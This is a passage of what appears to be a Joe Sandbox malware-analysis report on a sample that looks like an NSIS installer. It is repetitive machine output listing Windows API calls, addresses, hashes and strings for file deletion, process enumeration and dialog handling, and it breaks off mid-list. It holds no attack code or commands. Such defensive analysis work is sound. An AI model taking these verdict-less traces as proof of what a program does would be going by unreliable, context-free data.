                                                          • Associated: 00000000.00000002.1371483010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371538115.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371691960.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                          Similarity
                                                          • API ID: CloseHandle
                                                          • String ID:
                                                          • API String ID: 2962429428-0
                                                          • Opcode ID: a114d1ad3d6f72424773905f6d3d8555ffb504a96b4f495319bf21f79649ad7b
                                                          • Instruction ID: b9bdbc8744521ee651ba7bc90111acac5a2c88e2b86e9c74d328a3688b9dc09a
                                                          • Opcode Fuzzy Hash: a114d1ad3d6f72424773905f6d3d8555ffb504a96b4f495319bf21f79649ad7b
                                                          • Instruction Fuzzy Hash: 7BC0223810020092E1242F34AE0EB063A04F740330F500B3EF0F2F02F0D73C8640006D
                                                          APIs
                                                          • GetDlgItem.USER32(?,000003F9), ref: 00404993
                                                          • GetDlgItem.USER32(?,00000408), ref: 004049A0
                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 004049EF
                                                          • LoadBitmapW.USER32(0000006E), ref: 00404A02
                                                          • SetWindowLongW.USER32(?,000000FC,Function_000048CC), ref: 00404A1C
                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A2E
                                                          • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A42
                                                          • SendMessageW.USER32(?,00001109,00000002), ref: 00404A58
                                                          • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A64
                                                          • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404A74
                                                          • DeleteObject.GDI32(?), ref: 00404A79
                                                          • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AA4
                                                          • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404AB0
                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B51
                                                          • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404B74
                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B85
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00404BAF
                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BBE
                                                          • ShowWindow.USER32(?,00000005), ref: 00404BCF
                                                          • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CCD
                                                          • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D28
                                                          • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D3D
                                                          • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D61
                                                          • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404D87
                                                          • ImageList_Destroy.COMCTL32(?), ref: 00404D9C
                                                          • GlobalFree.KERNEL32(?), ref: 00404DAC
                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E1C
                                                          • SendMessageW.USER32(?,00001102,?,?), ref: 00404ECA
                                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404ED9
                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00404EF9
                                                          • ShowWindow.USER32(?,00000000), ref: 00404F49
                                                          • GetDlgItem.USER32(?,000003FE), ref: 00404F54
                                                          • ShowWindow.USER32(00000000), ref: 00404F5B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1371509946.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1371483010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371538115.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371691960.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                          • String ID: $ @$M$N
                                                          • API String ID: 1638840714-3479655940
                                                          • Opcode ID: 222e44079ed98782fbb34ec8da515d99173e785f6e02dcb26c66960398e67004
                                                          • Instruction ID: e2b6c32447eba08f07ab18e4c0942225b167af9b9c7e550a0b0592367213937f
                                                          • Opcode Fuzzy Hash: 222e44079ed98782fbb34ec8da515d99173e785f6e02dcb26c66960398e67004
                                                          • Instruction Fuzzy Hash: 09026CB0900209AFEF209FA4CD45AAE7BB5FB84314F10413AF615B62E1D7B89D91DF58
                                                          APIs
                                                          • GetDlgItem.USER32(?,000003F0), ref: 004044F9
                                                          • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404507
                                                          • GetDlgItem.USER32(?,000003FB), ref: 00404527
                                                          • GetAsyncKeyState.USER32(00000010), ref: 0040452E
                                                          • GetDlgItem.USER32(?,000003F0), ref: 00404543
                                                          • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404554
                                                          • SetWindowTextW.USER32(?,?), ref: 00404583
                                                          • SHBrowseForFolderW.SHELL32(?), ref: 0040463D
                                                          • lstrcmpiW.KERNEL32(00462540,00447240,00000000,?,?), ref: 0040467A
                                                          • lstrcatW.KERNEL32(?,00462540), ref: 00404686
                                                          • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404696
                                                          • CoTaskMemFree.OLE32(00000000), ref: 00404648
                                                            • Part of subcall function 00405C84: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403F81), ref: 00405C97
                                                            • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                            • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                            • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                            • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                            • Part of subcall function 00403E74: lstrcatW.KERNEL32(00000000,00000000,0046A560,004C70A8,install.log,00405A9C,004C70A8,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006), ref: 00403E8F
                                                          • GetDiskFreeSpaceW.KERNEL32(00443238,?,?,0000040F,?,00443238,00443238,?,00000000,00443238,?,?,000003FB,?), ref: 00404759
                                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404774
                                                            • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                          • SetDlgItemTextW.USER32(00000000,00000400,00409264), ref: 004047ED
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1371509946.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1371483010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371538115.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371691960.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                          Similarity
                                                          • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                          • String ID: 82D$@%F$@rD$A
                                                          • API String ID: 3347642858-1086125096
                                                          • Opcode ID: ae95d19a650443c120af7248ec578161461b31874b4e5badf60a47e74a1ad680
                                                          • Instruction ID: 5c5d6a603380bcdbc7d7d35b60f5621b43697e5e98684918e033f9398a36e476
                                                          • Opcode Fuzzy Hash: ae95d19a650443c120af7248ec578161461b31874b4e5badf60a47e74a1ad680
                                                          • Instruction Fuzzy Hash: D1B1A4B1900209BBDB11AFA1CD85AAF7AB8EF45314F10847BF605B72D1D77C8A41CB59
                                                          APIs
                                                          • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                                          • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F30
                                                          • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FA9
                                                          • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FB5
                                                          • lstrcmpA.KERNEL32(name,?), ref: 00406FC7
                                                          • CloseHandle.KERNEL32(?), ref: 004071E6
                                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1371509946.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1371483010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371538115.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371691960.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                          Similarity
                                                          • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                          • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                          • API String ID: 1916479912-1189179171
                                                          • Opcode ID: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                                          • Instruction ID: 34713ba181b26839f7619e948cf229fd8716e5ee99c03f3e8673f79b0d3e70cf
                                                          • Opcode Fuzzy Hash: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                                          • Instruction Fuzzy Hash: 9091BF70D1412DAACF04EBA5DD909FEBBBAEF48301F00416AF592F72D0E6785A05DB64
                                                          APIs
                                                          • DeleteFileW.KERNEL32(?,?,004C30A0), ref: 00406CB8
                                                          • lstrcatW.KERNEL32(0045C918,\*.*,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D09
                                                          • lstrcatW.KERNEL32(?,00408838,?,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D29
                                                          • lstrlenW.KERNEL32(?), ref: 00406D2C
                                                          • FindFirstFileW.KERNEL32(0045C918,?), ref: 00406D40
                                                          • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E22
                                                          • FindClose.KERNEL32(?), ref: 00406E33
                                                          Strings
                                                          • Delete: DeleteFile on Reboot("%s"), xrefs: 00406DE0
                                                          • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E58
                                                          • Delete: DeleteFile("%s"), xrefs: 00406DBC
                                                          • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406E93
                                                          • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EB0
                                                          • Delete: DeleteFile failed("%s"), xrefs: 00406DFD
                                                          • \*.*, xrefs: 00406D03
                                                          • RMDir: RemoveDirectory("%s"), xrefs: 00406E6F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1371509946.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1371483010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371538115.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371691960.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                          Similarity
                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                          • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*
                                                          • API String ID: 2035342205-3294556389
                                                          • Opcode ID: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
                                                          • Instruction ID: 0ca3ec5a28b3c1cae8259a28e21d86b18febecd5c0179aed135e39ed79665852
                                                          • Opcode Fuzzy Hash: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
                                                          • Instruction Fuzzy Hash: 2D51E3315043056ADB20AB61CD46EAF37B89F81725F22803FF943751D2DB7C49A2DAAD
                                                          APIs
                                                          • GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                          • GetSystemDirectoryW.KERNEL32(00462540,00002004), ref: 00406958
                                                            • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                          • GetWindowsDirectoryW.KERNEL32(00462540,00002004), ref: 0040696B
                                                          • lstrcatW.KERNEL32(00462540,\Microsoft\Internet Explorer\Quick Launch), ref: 004069E5
                                                          • lstrlenW.KERNEL32(00462540,0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 00406A47
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1371509946.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1371483010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371538115.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371691960.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                          Similarity
                                                          • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                          • String ID: @%F$@%F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                          • API String ID: 3581403547-784952888
                                                          • Opcode ID: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
                                                          • Instruction ID: 7881bd453c5698e0e02013fa1c3524f2cf467b60749c67c5a59258f73e57ab2a
                                                          • Opcode Fuzzy Hash: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
                                                          • Instruction Fuzzy Hash: F171F4B1A00215ABDB20AF28CD44A7E3771EF55314F12C03FE906B62E0E77C89A19B5D
                                                          APIs
                                                          • CoCreateInstance.OLE32(00409B24,?,00000001,00409B04,?), ref: 0040257E
                                                          Strings
                                                          • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1371509946.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1371483010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371538115.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371691960.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                          Similarity
                                                          • API ID: CreateInstance
                                                          • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                          • API String ID: 542301482-1377821865
                                                          • Opcode ID: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
                                                          • Instruction ID: c24c797a6f187c751e7d972b1a807078ee58ffeb38f484aa28d094541f0f6205
                                                          • Opcode Fuzzy Hash: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
                                                          • Instruction Fuzzy Hash: 02415E74A00205BFCF04EFA0CC99EAE7B79FF48314B20456AF915EB2E1C679A941CB54
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402E27
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1371509946.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1371483010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371538115.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371691960.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                          Similarity
                                                          • API ID: FileFindFirst
                                                          • String ID:
                                                          • API String ID: 1974802433-0
                                                          • Opcode ID: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
                                                          • Instruction ID: b91193b5dd17d351e639dca097a4c2443a83fae7855d8014906372cda19badf2
                                                          • Opcode Fuzzy Hash: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
                                                          • Instruction Fuzzy Hash: 4EE06D32600204AFD700EB749D45ABE736CDF01329F20457BF146F20D1E6B89A41976A
                                                          APIs
                                                          • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063BF
                                                          • lstrlenW.KERNEL32(?), ref: 004063CC
                                                          • GetVersionExW.KERNEL32(?), ref: 0040642A
                                                            • Part of subcall function 0040602B: CharUpperW.USER32(?,00406401,?), ref: 00406031
                                                          • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406469
                                                          • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00406488
                                                          • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00406492
                                                          • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040649D
                                                          • FreeLibrary.KERNEL32(00000000), ref: 004064D4
                                                          • GlobalFree.KERNEL32(?), ref: 004064DD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1371509946.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1371483010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371538115.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371691960.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                          Similarity
                                                          • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                          • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                          • API String ID: 20674999-2124804629
                                                          • Opcode ID: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                                                          • Instruction ID: f5db07f83b48746be4b9c4f5c588c21b75103c60b5638216cabcef37c42edb4d
                                                          • Opcode Fuzzy Hash: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                                                          • Instruction Fuzzy Hash: 38919331900219EBDF109FA4CD88AAFBBB8EF44741F11447BE546F6281DB388A51CF68
                                                          APIs
                                                          • lstrcpyW.KERNEL32(0045B2C8,NUL,?,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AA9
                                                          • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AC8
                                                          • GetShortPathNameW.KERNEL32(000000F1,0045B2C8,00000400), ref: 00406AD1
                                                            • Part of subcall function 00405DB6: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                                            • Part of subcall function 00405DB6: lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                                          • GetShortPathNameW.KERNEL32(000000F1,00460920,00000400), ref: 00406AF2
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,0045B2C8,000000FF,0045BAC8,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B1B
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00460920,000000FF,0045C118,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B33
                                                          • wsprintfA.USER32 ref: 00406B4D
                                                          • GetFileSize.KERNEL32(00000000,00000000,00460920,C0000000,00000004,00460920,?,?,00000000,000000F1,?), ref: 00406B85
                                                          • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406B94
                                                          • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BB0
                                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406BE0
                                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,0045C518,00000000,-0000000A,0040987C,00000000,[Rename]), ref: 00406C37
                                                            • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                            • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                          • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C4B
                                                          • GlobalFree.KERNEL32(00000000), ref: 00406C52
                                                          • CloseHandle.KERNEL32(?), ref: 00406C5C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1371509946.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1371483010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371538115.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371691960.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                          Similarity
                                                          • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                          • String ID: F$%s=%s$NUL$[Rename]
                                                          • API String ID: 565278875-1653569448
                                                          • Opcode ID: a83451b5c4aab99109613fb463f01f18261c5de4d9c28115f8397278e7cafe6e
                                                          • Instruction ID: f97e154d5ee7f709bd30e138c0dd6e282719408add8f0d739c14b832633f1bd9
                                                          • Opcode Fuzzy Hash: a83451b5c4aab99109613fb463f01f18261c5de4d9c28115f8397278e7cafe6e
                                                          • Instruction Fuzzy Hash: AE412632104208BFE6206B619E8CD6B3B6CDF86754B16043EF586F22D1DA3CDC158ABC
                                                          APIs
                                                          • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                          • BeginPaint.USER32(?,?), ref: 00401047
                                                          • GetClientRect.USER32(?,?), ref: 0040105B
                                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                          • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                          • DeleteObject.GDI32(?), ref: 004010F6
                                                          • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                          • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                          • SelectObject.GDI32(00000000,?), ref: 00401149
                                                          • DrawTextW.USER32(00000000,0046ADC0,000000FF,00000010,00000820), ref: 0040115F
                                                          • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                          • DeleteObject.GDI32(?), ref: 0040116E
                                                          • EndPaint.USER32(?,?), ref: 00401177
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1371509946.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1371483010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371538115.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
